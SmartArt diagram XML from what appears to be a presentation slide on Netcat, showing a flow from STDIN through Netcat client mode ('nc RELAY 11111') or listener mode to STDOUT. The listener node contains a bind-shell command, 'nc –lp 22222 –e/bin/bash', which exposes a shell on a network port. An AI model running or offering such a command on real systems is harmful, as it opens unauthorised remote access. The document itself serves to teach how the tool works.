            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{FBAE0CAD-14A7-6C4C-81E9-8719888FF73D}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{1F3EA756-DB31-BA4E-97B5-58C9B59B97AF}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{BD4E3D40-BD39-DE40-B346-F78384C8ECFB}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{78431135-9B8F-724E-A6D7-AABF40918783}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{DE80B55F-A72C-DE4D-BB15-ECBA58F6629A}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{837D0685-6055-A84E-91D2-D521FF0C902D}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{10044812-4A6F-0E48-BDBD-A09E02922AA0}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{A9307FA6-D48C-8F4D-9296-B436F25246F7}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{8549A9F4-2787-8A44-9745-A74E238129B2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2FB5E723-B271-044B-94D2-32FA77F4AEE2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{35D0B9DD-72A1-A34F-BEA0-A9B18A32221D}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8F17D150-C21F-A340-B070-8179F5529D5A}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F86C3ABA-BF85-804B-B733-317F0F8D14D9}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E530471C-AAEB-3945-9C83-42DE94C06C7E}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{079CCE1F-6ADE-F842-BA6C-FCE1ACA225BD}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}"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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1"/>
          <a:ext cx="3962400" cy="914399"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="26782" y="26783"/>
        <a:ext cx="3908836" cy="860835"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1809750" y="937261"/>
          <a:ext cx="342899" cy="411479"/>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5400000">
        <a:off x="1857756" y="971551"/>
        <a:ext cx="246887" cy="240029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1371601"/>
          <a:ext cx="3962400" cy="2133596"/>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Netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Client</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>(Initiates Connection)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="62491" y="1434092"/>
        <a:ext cx="3837418" cy="2008614"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1809750" y="3528058"/>
          <a:ext cx="342899" cy="411479"/>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5400000">
        <a:off x="1857756" y="3562348"/>
        <a:ext cx="246887" cy="240029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3962398"/>
          <a:ext cx="3962400" cy="914399"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="26782" y="3989180"/>
        <a:ext cx="3908836" cy="86083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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="44343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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="44343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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
